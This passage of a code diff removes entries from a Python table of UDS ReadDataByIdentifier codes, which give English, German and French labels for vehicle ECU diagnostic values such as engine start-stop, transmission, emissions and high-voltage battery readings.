-UDS_RDBI.dataIdentifiers[0x299f] = "Maximum vehicle speed to keep the engine automatically stopped" -UDS_RDBI.dataIdentifiers[0x29a0] = "29A1 29C0" -UDS_RDBI.dataIdentifiers[0x29a1] = "Delay to confirm that the vehicle is stoped consolidation of slope value" -UDS_RDBI.dataIdentifiers[0x29a2] = "Vehicle speed threshold to validate the minimum travel conditions" -UDS_RDBI.dataIdentifiers[0x29a3] = "Vehicle speed threshold to validate the minimum travel conditions in rear detected" -UDS_RDBI.dataIdentifiers[0x29a4] = "Vehicle speed threshold to authorize automatic stop" -UDS_RDBI.dataIdentifiers[0x29a7] = "StopAuto status StopAutoPhase" -UDS_RDBI.dataIdentifiers[0x29a9] = "Gear lever position received on the CAN" -UDS_RDBI.dataIdentifiers[0x29b0] = "CC strategy requested by the driver for Daimler type" -UDS_RDBI.dataIdentifiers[0x29b1] = "CC Main Switch Coherence detected failure for Daimler type" -UDS_RDBI.dataIdentifiers[0x29c0] = "29C1 29E0" -UDS_RDBI.dataIdentifiers[0x29e0] = "29E1 2A00" -UDS_RDBI.dataIdentifiers[0x29e1] = "Distance driven since HBN initialization" -UDS_RDBI.dataIdentifiers[0x29e2] = "Misfire bench mode activation boolean" -UDS_RDBI.dataIdentifiers[0x29e3] = "Rate of Misfire bench mode" -UDS_RDBI.dataIdentifiers[0x29e5] = "Bench value to adapt richness on all cylinders" -UDS_RDBI.dataIdentifiers[0x29e6] = "Delay before authorizing richness closed loop after start bench mode required for homologation" -UDS_RDBI.dataIdentifiers[0x29e7] = "Boolean enabling the canister purge fault bench mode" -UDS_RDBI.dataIdentifiers[0x29e8] = "Mastervac vacuum relative pressure by analog sensor" -UDS_RDBI.dataIdentifiers[0x29e9] = "The weighted average voltage of master vacuum absolute pressure sensor" -UDS_RDBI.dataIdentifiers[0x2c00] = "2C01 2C20" -UDS_RDBI.dataIdentifiers[0x2c03] = "Targetted gear engaged" -UDS_RDBI.dataIdentifiers[0x2c04] = "Auxiliary Transmission Pump Speed Commanded" # or gear engaged -UDS_RDBI.dataIdentifiers[0x2c05] = "Auxiliary Transmission Pump Speed Actual" -UDS_RDBI.dataIdentifiers[0x2c06] = "Auxiliary Transmission Pump Fault" -UDS_RDBI.dataIdentifiers[0x2c20] = "2C21 2C40" -UDS_RDBI.dataIdentifiers[0x2c2c] = "Kick down state" -UDS_RDBI.dataIdentifiers[0x2c40] = "2C41 2C60" -UDS_RDBI.dataIdentifiers[0x2c4f] = "ACC steering wheel commands validity transmitted to ACC ECU" -UDS_RDBI.dataIdentifiers[0x2c50] = "ACC steering wheel commands transmitted to ACC ECU" -UDS_RDBI.dataIdentifiers[0x2c51] = "ACC speed limiter main switch position transmitted to ACC ECU" -UDS_RDBI.dataIdentifiers[0x2c57] = "Driving gear on active shaft" -UDS_RDBI.dataIdentifiers[0x2c58] = "Clutch torque" -UDS_RDBI.dataIdentifiers[0x2c59] = "State of active clutch" -UDS_RDBI.dataIdentifiers[0x2c5b] = "Request to authorize the cranking according to the gear lever position and internal diagnosis of the ATCU" -UDS_RDBI.dataIdentifiers[0x2c5c] = "Automatic transmission range output for display" -UDS_RDBI.dataIdentifiers[0x2c5d] = "Target gear for active shaft" -UDS_RDBI.dataIdentifiers[0x2c60] = "2C61 2C80" -UDS_RDBI.dataIdentifiers[0x2c80] = "2C81 2CA0" -UDS_RDBI.dataIdentifiers[0x2c9b] = "Automatic Transmission output shaft revolution speed" -UDS_RDBI.dataIdentifiers[0x2d00] = "2D01 2D20" -UDS_RDBI.dataIdentifiers[0x2d40] = "2D41 2D60" -UDS_RDBI.dataIdentifiers[0x2d80] = "2D81 2DA0" -UDS_RDBI.dataIdentifiers[0x2e00] = "2E01 2E20" -UDS_RDBI.dataIdentifiers[0x2e01] = "IOC TCU Outputs ECall LED" -UDS_RDBI.dataIdentifiers[0x2e02] = "IOC TCU Antennas Active Phone Antenna" -UDS_RDBI.dataIdentifiers[0x2f01] = "OMA DM Server URL" -UDS_RDBI.dataIdentifiers[0x2f02] = "Vehicle Configuration" -UDS_RDBI.dataIdentifiers[0x2f03] = "ATP Base URL" -UDS_RDBI.dataIdentifiers[0x2f04] = "SMS Destinations" -UDS_RDBI.dataIdentifiers[0x2f05] = "Call Numbers" -UDS_RDBI.dataIdentifiers[0x2f06] = "Service Call Provider" -UDS_RDBI.dataIdentifiers[0x2f07] = "HU Connectiivity WCC settings" -UDS_RDBI.dataIdentifiers[0x2f08] = "ATP RCS URL" -UDS_RDBI.dataIdentifiers[0x2f09] = "APN URLs" -UDS_RDBI.dataIdentifiers[0x2f0a] = "MTU Size" -UDS_RDBI.dataIdentifiers[0x2f0b] = "Internet Connectivity Settings" -UDS_RDBI.dataIdentifiers[0x2f0c] = "Independent car heating settings" -UDS_RDBI.dataIdentifiers[0x2f0d] = "APN settings" -UDS_RDBI.dataIdentifiers[0x2fc1] = "freigegebene Schluessellinien" -UDS_RDBI.dataIdentifiers[0x2fd1] = "Schluessel Set Identification SSID" -UDS_RDBI.dataIdentifiers[0x2fe1] = "Zentralverriegelung Status gespeicherter Status Kofferraum" -UDS_RDBI.dataIdentifiers[0x2ff1] = "Pattern fuer HF Patternvergleich Testpattern Block1" -UDS_RDBI.dataIdentifiers[0x3000] = "Thatcham Einschalten Ausschalten Anfrage THATCHAM" -UDS_RDBI.dataIdentifiers[0x3001] = "Thatcham passive Linien Linie" -UDS_RDBI.dataIdentifiers[0x3004] = "Digitale Schalterleisten \"High\" erkannt Leiste" -UDS_RDBI.dataIdentifiers[0x3005] = "HU Connectivity USB Status State" -UDS_RDBI.dataIdentifiers[0x3006] = "NVLD Switch" # or Digitale Schalterleisten \"Low\" erkannt Leiste -UDS_RDBI.dataIdentifiers[0x3008] = "IP Addresses IP Address Type Data Radio Bearer" # or Zuendung Klemme15 Read Response Parameters Zuendung Klemme15 -UDS_RDBI.dataIdentifiers[0x3009] = "Zuendung Klemme15 plausibilisiert" -UDS_RDBI.dataIdentifiers[0x300f] = "APN Users" -UDS_RDBI.dataIdentifiers[0x3010] = "Gangsensor SG Vertikal 1 ROH" # or APN Passwords, Motoroelschalter -UDS_RDBI.dataIdentifiers[0x3011] = "Kraftstoffanforderung HW" # or Kickdownschalter / -erkennung, Gangsensor SG Vertikal 2 ROH, System Time, System Time UTC Unix Time Stamp Format -UDS_RDBI.dataIdentifiers[0x3012] = "Bremsschalter" # or Gangsensor SG Neutrallage -UDS_RDBI.dataIdentifiers[0x3013] = "Bremslichtschalter" -UDS_RDBI.dataIdentifiers[0x3014] = "Kupplungsschalter" -UDS_RDBI.dataIdentifiers[0x3015] = "Crashsignal Ueber HW LTG Flag" -UDS_RDBI.dataIdentifiers[0x3016] = "Zuendung Klemme 15 Read Zuendung Klemme15" # or Zuendung Klemme15 P L Ignition switch, Zuendung Klemme15 PRES Nein Ja -UDS_RDBI.dataIdentifiers[0x3017] = "Motoroelfuellstandschalter" -UDS_RDBI.dataIdentifiers[0x3018] = "Kickdownschalter" -UDS_RDBI.dataIdentifiers[0x3019] = "EV Delay Timer" # or Klemme50 Starter, Kupplungsschalter oben (Ein, EV Delay Timer CpcSyncDelayTimer -UDS_RDBI.dataIdentifiers[0x301c] = "CEP Server URL" -UDS_RDBI.dataIdentifiers[0x301d] = "NTP URL Pool" -UDS_RDBI.dataIdentifiers[0x301e] = "RTMATPbaseURL" -UDS_RDBI.dataIdentifiers[0x3020] = "Waehlhebel Fahrstufe Motorfernstart" -UDS_RDBI.dataIdentifiers[0x3021] = "Waehlhebel Fahrstufe" -UDS_RDBI.dataIdentifiers[0x3022] = "Maintenance Management Weighting Factors divisor weighting factor" # or Tumbleklappenschalter 1 Spannung, Maintenance Management Weighting Factors -UDS_RDBI.dataIdentifiers[0x3023] = "Tumbleklappenschalter 2 Spannung" -UDS_RDBI.dataIdentifiers[0x3024] = "Schutzeinrichtung Motorhabenkontaktschalter" # or E Call Parameter AUTOMATIC KEYLOCK TIMER, E Call Parameter -UDS_RDBI.dataIdentifiers[0x3025] = "VIN Mapping" # or VIN Mapping Entry, Getriebetyp Automatik -UDS_RDBI.dataIdentifiers[0x3030] = "Abgasklappe Endstufe Spannung" -UDS_RDBI.dataIdentifiers[0x3031] = "Abgasklappe Winkelsensor Spannung" -UDS_RDBI.dataIdentifiers[0x3032] = "Klimaanlagen Schalter" # or Sensor Versorgungsspannung -UDS_RDBI.dataIdentifiers[0x3034] = "Tempomat" -UDS_RDBI.dataIdentifiers[0x3035] = "Tempomat Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x3400] = "3401 3420" -UDS_RDBI.dataIdentifiers[0x3401] = "IUPR 3 voices catalyst dignostic Number of times the system enters in each diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3402] = "IUPR Oxygene sensor diagnostic Number of times the system enters in each diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3403] = "IUPR 3 voices catalyst dignostic Number of criteria calculated by resolution" -UDS_RDBI.dataIdentifiers[0x3404] = "IUPR Oxygene sensor diagnostic Number of criteria calculated by resolution" -UDS_RDBI.dataIdentifiers[0x3405] = "IUPR 3 voices catalyst dignostic Number of times the system quits each diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3406] = "IUPR Oxygene sensor diagnostic Number of times the system quits each diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3407] = "IUPR Number of driving cycle with 3 voices cata diagnosis aborted" -UDS_RDBI.dataIdentifiers[0x3408] = "IUPR Number of driving cycle with lbup diagnosis aborted" -UDS_RDBI.dataIdentifiers[0x3409] = "IUPR 3 voices catalyst dignostic Average of the maximum durations in diagnosis conditions without diagnosis done" -UDS_RDBI.dataIdentifiers[0x340a] = "IUPR Oxygene sensor diagnostic Average of the maximum durations in diagnosis conditions without diagnosis done" -UDS_RDBI.dataIdentifiers[0x340b] = "IUPR Number of times the system enters in each doc diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x340c] = "IUPR Number of times the system enters in each pft diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x340d] = "IUPR Number of criteria calculated by resolution for the doc diagnosis" -UDS_RDBI.dataIdentifiers[0x340e] = "IUPR Number of criteria calculated by resolution in area 1 for the pft diagnosis" -UDS_RDBI.dataIdentifiers[0x340f] = "IUPR Number of criteria calculated by resolution in area 2 for the pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3410] = "IUPR Number of criteria calculated by resolution in area 3 for the pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3411] = "IUPR Number of criteria calculated by resolution in area 4 for the pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3412] = "IUPR Number of times the system quits each doc diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3413] = "IUPR Number of times the system quits each pft diagnosis conditions" -UDS_RDBI.dataIdentifiers[0x3414] = "IUPR 1st part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x3415] = "IUPR 2nd part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x3416] = "IUPR 3rd part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x3417] = "IUPR 4th part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x3418] = "IUPR 5th part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x3419] = "IUPR 6th part of table of diagnosis EGR enabling condtions" -UDS_RDBI.dataIdentifiers[0x341a] = "IUPR 1st part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x341b] = "IUPR 2nd part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x341c] = "IUPR 3rd part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x341d] = "IUPR 4th part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x3420] = "3421 3440" -UDS_RDBI.dataIdentifiers[0x3421] = "2 last element of operating point when a misfire occurs for OBD Recorder" -UDS_RDBI.dataIdentifiers[0x3424] = "1st part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3425] = "2nd part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3426] = "3rd part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3427] = "4th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3428] = "5th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x3429] = "6th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x342a] = "7th part of Number of criteria calculated by resolution for mass soot integer pft diagnosis" -UDS_RDBI.dataIdentifiers[0x342b] = "IUPR 5th part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x342c] = "IUPR 6th part of table of diagnosis EGR disabling condtions" -UDS_RDBI.dataIdentifiers[0x342d] = "Total vehicle distance at the last oil drain" -UDS_RDBI.dataIdentifiers[0x342e] = "Number of engine revolutions since the last oil drain" -UDS_RDBI.dataIdentifiers[0x342f] = "Vehicle kilometer when the alert appears" -UDS_RDBI.dataIdentifiers[0x3430] = "Total vehicle distance stored at the last pre alert" -UDS_RDBI.dataIdentifiers[0x3431] = "4th part of the table for rear O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" -UDS_RDBI.dataIdentifiers[0x3432] = "1st part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" -UDS_RDBI.dataIdentifiers[0x3433] = "2nd part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" -UDS_RDBI.dataIdentifiers[0x3434] = "3rd part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" -UDS_RDBI.dataIdentifiers[0x3435] = "4th part of the table for upstream O2 sensor heater efficiency diagnosis criteria distribution for OBD recorder" -UDS_RDBI.dataIdentifiers[0x3436] = "IUPR Oxydation Catalyst diagnostic Average of the highest durations in diagnosis conditions without diagnosis done Re" -UDS_RDBI.dataIdentifiers[0x3440] = "3441 3460" -UDS_RDBI.dataIdentifiers[0x3441] = "1st and 2nd part of table of diagnosis boost pressure enabling condtions" -UDS_RDBI.dataIdentifiers[0x3442] = "3rd and 4th part of table of diagnosis boost pressure enabling condtions" -UDS_RDBI.dataIdentifiers[0x3443] = "table of diagnosis EGR criteria" -UDS_RDBI.dataIdentifiers[0x3444] = "1st part table of diagnosis boost pressure criteria condtions" -UDS_RDBI.dataIdentifiers[0x3445] = "2nd part of table of diagnosis boost pressure criteria condtions" -UDS_RDBI.dataIdentifiers[0x3446] = "3rd part of table of diagnosis boost pressure criteria condtions" -UDS_RDBI.dataIdentifiers[0x3447] = "4th part of table of diagnosis boost pressure criteria condtions" -UDS_RDBI.dataIdentifiers[0x344a] = "2 first bytes of the cumulative number of engine starts" -UDS_RDBI.dataIdentifiers[0x344b] = "2 first bytes of the number of engine first starts or number of trips done by the vehicle" -UDS_RDBI.dataIdentifiers[0x344c] = "2 first bytes of the cumulative number of engine starts non resettable" -UDS_RDBI.dataIdentifiers[0x344d] = "2 first bytes of the number of engine first starts or number of trips done by the vehicle non resettable" -UDS_RDBI.dataIdentifiers[0x3456] = "3rd byte of the cumulative number of engine starts" -UDS_RDBI.dataIdentifiers[0x3457] = "3rd byte of the number of engine first starts or number of trips done by the vehicle" -UDS_RDBI.dataIdentifiers[0x3458] = "3rd byte of the cumulative number of engine starts non resettable" -UDS_RDBI.dataIdentifiers[0x3459] = "3rd byte of the number of engine first starts or number of trips done by the vehicle non resettable" -UDS_RDBI.dataIdentifiers[0x345a] = "3rd byte of the number of engine first starts or number of trips done by the vehicle non resettable" -UDS_RDBI.dataIdentifiers[0x345e] = "Ratio IUPR classe pool" -UDS_RDBI.dataIdentifiers[0x345f] = "Numerateur et denominateur des IUPR pour les classes private" -UDS_RDBI.dataIdentifiers[0x3b01] = "open cable detection test result" -UDS_RDBI.dataIdentifiers[0x3b02] = "open cable detection circuit check result" -UDS_RDBI.dataIdentifiers[0x3b03] = "Disabler for isolation detection" -UDS_RDBI.dataIdentifiers[0x3b04] = "Disabler for open cable detection" -UDS_RDBI.dataIdentifiers[0x3b05] = "Disabler for weld check and active discharge functionality" -UDS_RDBI.dataIdentifiers[0x3b06] = "Disabler for open cable detection circuit check" -UDS_RDBI.dataIdentifiers[0x3b07] = "Disabler for contactor closure after failed weld check" -UDS_RDBI.dataIdentifiers[0x3f00] = "Reset Zaehler Batteriefehler Reset Zaehler" # or WD Reset Counter Read Watchdog Reset Zaehler -UDS_RDBI.dataIdentifiers[0x3f01] = "WD Reset Counter Reset" -UDS_RDBI.dataIdentifiers[0x3f02] = "FBS mobil Tuergriff Lieferant" -UDS_RDBI.dataIdentifiers[0x3f03] = "Service Call Settings" -UDS_RDBI.dataIdentifiers[0x3f04] = "E Call Settings" -UDS_RDBI.dataIdentifiers[0x3f05] = "ERA Test Mode Numbers" -UDS_RDBI.dataIdentifiers[0x3f06] = "ERA 54620 Appendix A Parameter" -UDS_RDBI.dataIdentifiers[0x3f07] = "RTM settings" -UDS_RDBI.dataIdentifiers[0x3f08] = "Fastpath settings" -UDS_RDBI.dataIdentifiers[0x3f09] = "FastpathTopicTree" -UDS_RDBI.dataIdentifiers[0x3f12] = "High Voltage Battery Charge" -UDS_RDBI.dataIdentifiers[0x3f15] = "Impact Event" -UDS_RDBI.dataIdentifiers[0x3f17] = "Regenerative Braking" -UDS_RDBI.dataIdentifiers[0x3f18] = "System State" -UDS_RDBI.dataIdentifiers[0x3f20] = "Start-Stop Enable" -UDS_RDBI.dataIdentifiers[0x3f21] = "Jump Assist State" -UDS_RDBI.dataIdentifiers[0x3f22] = "Transmission Range Transistion State" -UDS_RDBI.dataIdentifiers[0x3f23] = "X/Y Valves Current State" -UDS_RDBI.dataIdentifiers[0x3f24] = "X/Y Valves Commanded State" -UDS_RDBI.dataIdentifiers[0x3f25] = "X/Y Valves Transition State" -UDS_RDBI.dataIdentifiers[0x3f26] = "Estimated Line Pressure" -UDS_RDBI.dataIdentifiers[0x3f27] = "Motor A Inverter" -UDS_RDBI.dataIdentifiers[0x3f28] = "Motor B Inverter" -UDS_RDBI.dataIdentifiers[0x3f29] = "Vehicle total distance" -UDS_RDBI.dataIdentifiers[0x3f30] = "BMW Car Group Active Diagnostic Information" -UDS_RDBI.dataIdentifiers[0x3f32] = "BMW Car Group Reprogramming Attempt Counter" -UDS_RDBI.dataIdentifiers[0x3f34] = "BMW Car Group Read Fingerprint" -UDS_RDBI.dataIdentifiers[0x3f36] = "BMW Car Group Hardware Version Information" -UDS_RDBI.dataIdentifiers[0x3f38] = "BMW Car Group Software Version Information" -UDS_RDBI.dataIdentifiers[0x3f3a] = "BMW Car Group Boot Software Version Information" -UDS_RDBI.dataIdentifiers[0x3f3c] = "BMW Car Group Hardware Supplier Identification" -UDS_RDBI.dataIdentifiers[0x3f3e] = "BMW Car Group Software Supplier Identification" -UDS_RDBI.dataIdentifiers[0x3f41] = "BMW Car Group Hardware Part Number" -UDS_RDBI.dataIdentifiers[0x3f51] = "BMW Car Group Software Part Number" -UDS_RDBI.dataIdentifiers[0x3f61] = "BMW Car Group ECU Assembly Number" -UDS_RDBI.dataIdentifiers[0x3f80] = "BMW Car Group Assembly Number" -UDS_RDBI.dataIdentifiers[0x3f90] = "ZIF Lesen" -UDS_RDBI.dataIdentifiers[0x4000] = "Kraftstoffpumpenspannung" -UDS_RDBI.dataIdentifiers[0x4001] = "Full Diagnostic Availability Check" # or Jump Assist added Charge -UDS_RDBI.dataIdentifiers[0x4002] = "HV Current Channel A" # or RDiag Transmission Statistics Day, Drosselklappe Poti1 -UDS_RDBI.dataIdentifiers[0x4003] = "HV Current Channel B " # or Drosselklappe Poti2 -UDS_RDBI.dataIdentifiers[0x4004] = "MCPB Motor A Active Control State" # or MCPA Motor B Active Control Stat" # or Kraftstoffpumpenphasenstrom -UDS_RDBI.dataIdentifiers[0x4005] = "Operation" -UDS_RDBI.dataIdentifiers[0x4006] = "PCB Temperature" # or RDiag RDA Initial Summary Block Datablock, Drosselklappe Lernvorgang Beendet -UDS_RDBI.dataIdentifiers[0x4007] = "Hood State" # or Drosselklappe Erfolgreich Gelernt, RDiag oVCI ECU List incl dynamic content HexDump ECUList including dynamic content -UDS_RDBI.dataIdentifiers[0x4008] = "LV Bus Current" -UDS_RDBI.dataIdentifiers[0x4009] = "Nockenwellenadaption Einlass" # or EMPI -UDS_RDBI.dataIdentifiers[0x400a] = "Inhibit Input-Output History" -UDS_RDBI.dataIdentifiers[0x400b] = "EMPI Speed Commanded" -UDS_RDBI.dataIdentifiers[0x400c] = "EMPI Speed Actual" -UDS_RDBI.dataIdentifiers[0x400d] = "Time since Propulsion System Active" -UDS_RDBI.dataIdentifiers[0x400e] = "Sensed Engine Torque" -UDS_RDBI.dataIdentifiers[0x400f] = "Achieved DSM Position" -UDS_RDBI.dataIdentifiers[0x4010] = "Abgasklappen" # or Park Verification Switch -UDS_RDBI.dataIdentifiers[0x4011] = "Luefternachlauf angefordert" # or Transmission PRND Range -UDS_RDBI.dataIdentifiers[0x4012] = "Nachlauf Anforderung AGK" # or HV Fuse, Nockenwellenwinkel Einlass -UDS_RDBI.dataIdentifiers[0x4013] = "Luefter PWM Fehlerstatus" # or HV Fuse Information -UDS_RDBI.dataIdentifiers[0x4014] = "Aktuelles Ist-Tastverhaeltnis Tankentlueftungsventil" # or Bugschuerzenjalouse LIN Sollwert, Tankentlueftung Aktuelles Tastverhaeltnis -UDS_RDBI.dataIdentifiers[0x4015] = "Bugschuerzenjalouse LIN Referenzfahrt" # or Drosselklappe Poti1 Unterer Anschlag, Spannung DK-Poti 1 am unteren Anschlag -UDS_RDBI.dataIdentifiers[0x4016] = "Bugschuerzenjalouse LIN Fehlerstatus" # or Spannung DK-Poti 2 am unteren Anschlag, Drosselklappe Poti2 Unterer Anschlag -UDS_RDBI.dataIdentifiers[0x4017] = "Drosselklappe Winkel Notluftposition" # or DK-Winkel der Notluftposition, Kuehlaggregat Chillerventil CO2 Initialisierungsstatus -UDS_RDBI.dataIdentifiers[0x4018] = "Drosselklappe Verstaerkung1" -UDS_RDBI.dataIdentifiers[0x4019] = "Drosselklappe Verstaerkung1 Spannungsoffset" -UDS_RDBI.dataIdentifiers[0x401b] = "Drosselklappe Referenzablage erfolgreich" -UDS_RDBI.dataIdentifiers[0x4020] = "Kuehlmittel Drehschieberventil LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4021] = "Verstaerkte Spannung DK-Poti" # or Kuehlmittel Drehschieberventil BMS Sollwert, Drosselklappe Poti1 verstaerkt -UDS_RDBI.dataIdentifiers[0x4022] = "Chiller Sollwert" -UDS_RDBI.dataIdentifiers[0x4023] = "Kaeltemittelkreislauf HV Batterie Ventil Sollwert" -UDS_RDBI.dataIdentifiers[0x4024] = "Kaeltemittelkreislauf Chiller Sollwert" -UDS_RDBI.dataIdentifiers[0x4025] = "Wasserpumpe LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4026] = "Kuehlmittelpumpe Ladeluft Sollwert" -UDS_RDBI.dataIdentifiers[0x4027] = "Kuehlmittelpumpe BMS Sollwert" -UDS_RDBI.dataIdentifiers[0x4028] = "Kuehlerjalousie LIN Referenzfahrt Fehler" -UDS_RDBI.dataIdentifiers[0x4033] = "Drosselklappe Winkel Bezogen auf Unteren Anschlag" # or DK-Winkel unterer Anschlag -UDS_RDBI.dataIdentifiers[0x4040] = "SG intern gemessener Ausgangsstrom zur DMTL Pumpe" # or DMTL Pumpenstrom -UDS_RDBI.dataIdentifiers[0x4041] = "Motordrehzahlbegrenzung Aktiv" # or Motordrehzahlbegrenzung ist aktiv -UDS_RDBI.dataIdentifiers[0x4042] = "Fuelrailentlueftungsfunktion Freigabe Laueft" -UDS_RDBI.dataIdentifiers[0x4046] = "Fuelrailentlueftungsfunktion NachStart" -UDS_RDBI.dataIdentifiers[0x4060] = "Nockenwellenreferenzadaption Zustand Einlass" -UDS_RDBI.dataIdentifiers[0x4061] = "Nockenwellenreferenzadaption Zustand Auslass" -UDS_RDBI.dataIdentifiers[0x4062] = "Nockenwellenreferenzadaption Zustand Einlass Links" -UDS_RDBI.dataIdentifiers[0x4063] = "Nockenwellenreferenzadaption Zustand Auslass Links" -UDS_RDBI.dataIdentifiers[0x4064] = "Nockenwellenreferenzadaption Winkeldifferenz Einlass" -UDS_RDBI.dataIdentifiers[0x4065] = "Nockenwellenreferenzadaption Winkeldifferenz Auslass" -UDS_RDBI.dataIdentifiers[0x4066] = "Nockenwellenreferenzadaption Winkeldifferenz Einlass Links" -UDS_RDBI.dataIdentifiers[0x4067] = "Nockenwellenreferenzadaption Winkeldifferenz Auslass Links" -UDS_RDBI.dataIdentifiers[0x4070] = "Niedertemperatur Pumpenlaufzeit" -UDS_RDBI.dataIdentifiers[0x4086] = "Wastegate Position ROH" -UDS_RDBI.dataIdentifiers[0x4087] = "Wastegate Position" -UDS_RDBI.dataIdentifiers[0x4088] = "Wastegate Adaption laeuft" -UDS_RDBI.dataIdentifiers[0x408a] = "Wastegate Adaption Ergebnis" -UDS_RDBI.dataIdentifiers[0x408b] = "Wastegate Adaption Abbruch" -UDS_RDBI.dataIdentifiers[0x40d0] = "DC Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40d2] = "Sensor" -UDS_RDBI.dataIdentifiers[0x40d6] = "Sensor Voltage" -UDS_RDBI.dataIdentifiers[0x40d7] = "Module Temp Sensor" -UDS_RDBI.dataIdentifiers[0x40d8] = "Module Temp Sensor 1 Voltage" -UDS_RDBI.dataIdentifiers[0x40d9] = "Module Temp Sensor" -UDS_RDBI.dataIdentifiers[0x40da] = "Module Temp Sensor 2 Voltage" -UDS_RDBI.dataIdentifiers[0x40db] = "Module Temp Sensor" -UDS_RDBI.dataIdentifiers[0x40dc] = "Module Temp Sensor 3 Voltage" -UDS_RDBI.dataIdentifiers[0x40dd] = "Module Temp Sensor 4" -UDS_RDBI.dataIdentifiers[0x40de] = "Module Temp Sensor 4 Voltage" -UDS_RDBI.dataIdentifiers[0x40e4] = "Module 1 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40e5] = "Module 2 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40e6] = "Module 3 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40e7] = "Fan Speed" -UDS_RDBI.dataIdentifiers[0x40e8] = "Fan Commanded PWM" -UDS_RDBI.dataIdentifiers[0x40e9] = "High Voltage Battery Resistance" -UDS_RDBI.dataIdentifiers[0x40eb] = "Maximum Module Voltage" -UDS_RDBI.dataIdentifiers[0x40ec] = "Minimum Module Voltage" -UDS_RDBI.dataIdentifiers[0x40ee] = "DisCharge Power Available Short Term" -UDS_RDBI.dataIdentifiers[0x40ef] = "Charge Power Available Short Term" -UDS_RDBI.dataIdentifiers[0x40f0] = "Module 7 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f1] = "Module 8 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f2] = "Module 9 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f3] = "Module 10 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f4] = "Module 11Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f5] = "Module 12 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f6] = "Module 13 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f7] = "Module 14 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f8] = "Module 15 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40f9] = "Module 16 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40fa] = "Module 17 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40fb] = "Module 18 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40fc] = "Module 19 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40fd] = "Module 20 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x40fe] = "Voltage Calculated" -UDS_RDBI.dataIdentifiers[0x40ff] = "AC Isolation Resistance" -UDS_RDBI.dataIdentifiers[0x4100] = "HVIL Source Current" -UDS_RDBI.dataIdentifiers[0x4101] = "HVIL Return Current" -UDS_RDBI.dataIdentifiers[0x4102] = "Contactor Stat" -UDS_RDBI.dataIdentifiers[0x4103] = "Contactor Open" -UDS_RDBI.dataIdentifiers[0x4104] = "Contactor Weld Check Stat" -UDS_RDBI.dataIdentifiers[0x4105] = "battery Contactor Commanded PWM " -UDS_RDBI.dataIdentifiers[0x4106] = "High Battery Contactor Command Stat" -UDS_RDBI.dataIdentifiers[0x4107] = "Inlet Air Temp Sensor" -UDS_RDBI.dataIdentifiers[0x4108] = "Inlet Air Temp Sensor Voltage" -UDS_RDBI.dataIdentifiers[0x4109] = "Outlet Air Temp Sensor" -UDS_RDBI.dataIdentifiers[0x410a] = "Outlet Air Temp Sensor Voltage" -UDS_RDBI.dataIdentifiers[0x410b] = "Module 4 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x410c] = "Module 5 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x410d] = "Module 6 Voltage Sensor" -UDS_RDBI.dataIdentifiers[0x4110] = "BPCM Observed Positive Rail Welded Contactor" -UDS_RDBI.dataIdentifiers[0x4111] = "BPCM Observed Negative Rail Welded Contactor" -UDS_RDBI.dataIdentifiers[0x4112] = "BPCM Observed Both Rails Welded Contactor" -UDS_RDBI.dataIdentifiers[0x4113] = "Benzin Betrieb Verbot wegen Crash" -UDS_RDBI.dataIdentifiers[0x4114] = "Bremskreis Unterdruckpumpe 